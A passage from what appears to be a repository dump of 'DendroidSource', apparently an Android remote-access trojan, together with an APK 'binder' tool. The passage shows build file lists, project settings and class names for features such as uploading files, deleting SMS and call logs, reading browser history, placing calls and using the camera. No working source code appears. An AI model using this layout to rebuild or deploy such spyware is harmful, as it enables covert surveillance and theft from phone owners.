LCBOsVMR9FXYJLZW2+TcIkCRLXWG/oiVHQGo/rWuWkJgU134NDEFJCJGjDbiLCpe 24 | +ZTWHdcwauTJ9pUbo8EvHRkU3cYfGmLaLfgn9gP+pWA7LFQNvXwBnDa6sppCccEX 25 | 31I828XzgXpJ4O+mDL1/dBd+ek8ZPUP0IgdyZm5MTYPhvVqGCHzzTy3sIeJFymwr 26 | sBbmg2OAUNLEMO6nwmocSdN2ClirfxqCzJOLSDE4QyS9BAH6EhY6UFcOaE0= 27 | -----END CERTIFICATE----- 28 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/framework/signapk.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/framework/signapk.jar -------------------------------------------------------------------------------- /master/APKBinder/bin/Release/APKBinder.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Release/APKBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Release/APKBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/bin/Release/APKBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | APKBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/APKBinder.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/APKBinder.Form1.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/APKBinder.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/APKBinder.Resources.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/APKBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/APKBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/APKBinder.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Debug\APKBinder.exe.config 2 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Debug\APKBinder.exe.config 3 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Debug\APKBinder.exe 4 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Debug\APKBinder.pdb 5 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Debug\APKBinder.xml 6 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\ResolveAssemblyReference.cache 7 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\APKBinder.Form1.resources 8 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\APKBinder.Resources.resources 9 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\GenerateResource-ResGen.read.1.tlog 10 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\GenerateResource.read.1.tlog 11 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\GenerateResource-ResGen.write.1.tlog 12 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\GenerateResource.write.1.tlog 13 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\APKBinder.exe 14 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\APKBinder.xml 15 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Debug\APKBinder.pdb 16 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\bin\Debug\APKBinder.exe.config 17 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Debug\APKBinder.exe 18 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Debug\APKBinder.xml 19 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Debug\APKBinder.pdb 20 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/APKBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | APKBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DendroidBinder.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/DendroidBinder.Form1.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DendroidBinder.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/DendroidBinder.Resources.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DendroidBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/DendroidBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DendroidBinder.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\bin\Debug\DendroidBinder.exe 2 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\bin\Debug\DendroidBinder.pdb 3 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\bin\Debug\DendroidBinder.xml 4 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\ResolveAssemblyReference.cache 5 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\DendroidBinder.Resources.resources 6 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\GenerateResource.read.1.tlog 7 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\GenerateResource.write.1.tlog 8 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\DendroidBinder.exe 9 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\DendroidBinder.xml 10 | C:\Users\COMPUTER\AppData\Local\Temporary Projects\DendroidBinder\obj\x86\Debug\DendroidBinder.pdb 11 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\DendroidBinder.exe 12 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\DendroidBinder.xml 13 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\DendroidBinder.pdb 14 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Debug\DendroidBinder.exe.config 15 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Debug\DendroidBinder.exe 16 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Debug\DendroidBinder.pdb 17 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Debug\DendroidBinder.xml 18 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\ResolveAssemblyReference.cache 19 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\DendroidBinder.Form1.resources 20 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\DendroidBinder.Resources.resources 21 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\GenerateResource-ResGen.read.1.tlog 22 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\GenerateResource.read.1.tlog 23 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\GenerateResource-ResGen.write.1.tlog 24 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Debug\GenerateResource.write.1.tlog 25 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DendroidBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | DendroidBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/GenerateResource-ResGen.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/GenerateResource-ResGen.read.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/GenerateResource-ResGen.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/GenerateResource-ResGen.write.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/GenerateResource.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/GenerateResource.read.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/GenerateResource.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/GenerateResource.write.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Debug/TempPE/My Project.Resources.Designer.vb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Debug/TempPE/My Project.Resources.Designer.vb.dll -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/APKBinder.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/APKBinder.Form1.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/APKBinder.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/APKBinder.Resources.resources -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/APKBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/APKBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/APKBinder.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Release\APKBinder.exe.config 2 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Release\APKBinder.exe 3 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Release\APKBinder.pdb 4 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\bin\Release\APKBinder.xml 5 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\ResolveAssemblyReference.cache 6 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\APKBinder.Form1.resources 7 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\APKBinder.Resources.resources 8 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\GenerateResource-ResGen.read.1.tlog 9 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\GenerateResource-ResGen.write.1.tlog 10 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\APKBinder.exe 11 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\APKBinder.xml 12 | C:\Users\COMPUTER\Desktop\DendroidBinder\APKBinder\obj\x86\Release\APKBinder.pdb 13 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\bin\Release\APKBinder.exe.config 14 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\bin\Release\APKBinder.exe 15 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\bin\Release\APKBinder.pdb 16 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\bin\Release\APKBinder.xml 17 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\ResolveAssemblyReference.cache 18 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\APKBinder.Form1.resources 19 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\APKBinder.Resources.resources 20 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\GenerateResource-ResGen.read.1.tlog 21 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\GenerateResource-ResGen.write.1.tlog 22 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\APKBinder.exe 23 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\APKBinder.xml 24 | C:\Users\COMPUTER\Desktop\DendroidBinder\backup\APKBinder\obj\x86\Release\APKBinder.pdb 25 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/APKBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | APKBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/DendroidBinder.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\ResolveAssemblyReference.cache 2 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\GenerateResource-ResGen.read.1.tlog 3 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\GenerateResource-ResGen.write.1.tlog 4 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Release\APKBinder.exe.config 5 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Release\APKBinder.exe 6 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Release\APKBinder.pdb 7 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\bin\Release\APKBinder.xml 8 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\APKBinder.Form1.resources 9 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\APKBinder.Resources.resources 10 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\APKBinder.exe 11 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\APKBinder.xml 12 | C:\Users\COMPUTER\Desktop\DendroidBinder\DendroidBinder\obj\x86\Release\APKBinder.pdb 13 | -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/GenerateResource-ResGen.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/GenerateResource-ResGen.read.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/GenerateResource-ResGen.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/GenerateResource-ResGen.write.1.tlog -------------------------------------------------------------------------------- /master/APKBinder/obj/x86/Release/TempPE/My Project.Resources.Designer.vb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/obj/x86/Release/TempPE/My Project.Resources.Designer.vb.dll -------------------------------------------------------------------------------- /master/Dendroid APK.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK.zip -------------------------------------------------------------------------------- /master/Dendroid APK/.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /master/Dendroid APK/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | Droidian 4 | 5 | 6 | 7 | 8 | 9 | com.android.ide.eclipse.adt.ResourceManagerBuilder 10 | 11 | 12 | 13 | 14 | com.android.ide.eclipse.adt.PreCompilerBuilder 15 | 16 | 17 | 18 | 19 | org.eclipse.jdt.core.javabuilder 20 | 21 | 22 | 23 | 24 | com.android.ide.eclipse.adt.ApkBuilder 25 | 26 | 27 | 28 | 29 | 30 | com.android.ide.eclipse.adt.AndroidNature 31 | org.eclipse.jdt.core.javanature 32 | 33 | 34 | -------------------------------------------------------------------------------- /master/Dendroid APK/.settings/org.eclipse.jdt.core.prefs: -------------------------------------------------------------------------------- 1 | eclipse.preferences.version=1 2 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6 3 | org.eclipse.jdt.core.compiler.compliance=1.6 4 | org.eclipse.jdt.core.compiler.source=1.6 5 | -------------------------------------------------------------------------------- /master/Dendroid APK/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 9 | 10 | 11 | 15 | 16 | 22 | 25 | 26 | 27 | 28 | 29 | 30 | 33 | 34 | 37 | 38 | 41 | 42 | 45 | 46 | 50 | 51 | 52 | 53 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /master/Dendroid APK/assets/android-support-v4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/assets/android-support-v4.jar -------------------------------------------------------------------------------- /master/Dendroid APK/bin/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 9 | 10 | 11 | 15 | 16 | 22 | 25 | 26 | 27 | 28 | 29 | 30 | 33 | 34 | 37 | 38 | 41 | 42 | 45 | 46 | 50 | 51 | 52 | 53 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony$Stub$Proxy.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony$Stub$Proxy.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony$Stub.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony$Stub.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/android/internal/telephony/ITelephony.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/CameraView$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/CameraView$1.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/CameraView$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/CameraView$2.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/CameraView.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/CameraView.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/Dialog$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/Dialog$1.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/Dialog$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/Dialog$2.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/Dialog.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/Dialog.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/Droidian.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/Droidian.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$1.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$2.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$3.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$3.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$MyLocalBinder.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$MyLocalBinder.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$UploadFile.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$UploadFile.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$UploadFiles.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$UploadFiles.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$callNumber.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$callNumber.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$changeDirectory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$changeDirectory.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteCallLogNumber.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteCallLogNumber.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteFiles.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteFiles.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteSms.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$deleteSms.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getBrowserBookmarks.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getBrowserBookmarks.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getBrowserHistory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getBrowserHistory.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getCallHistory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid 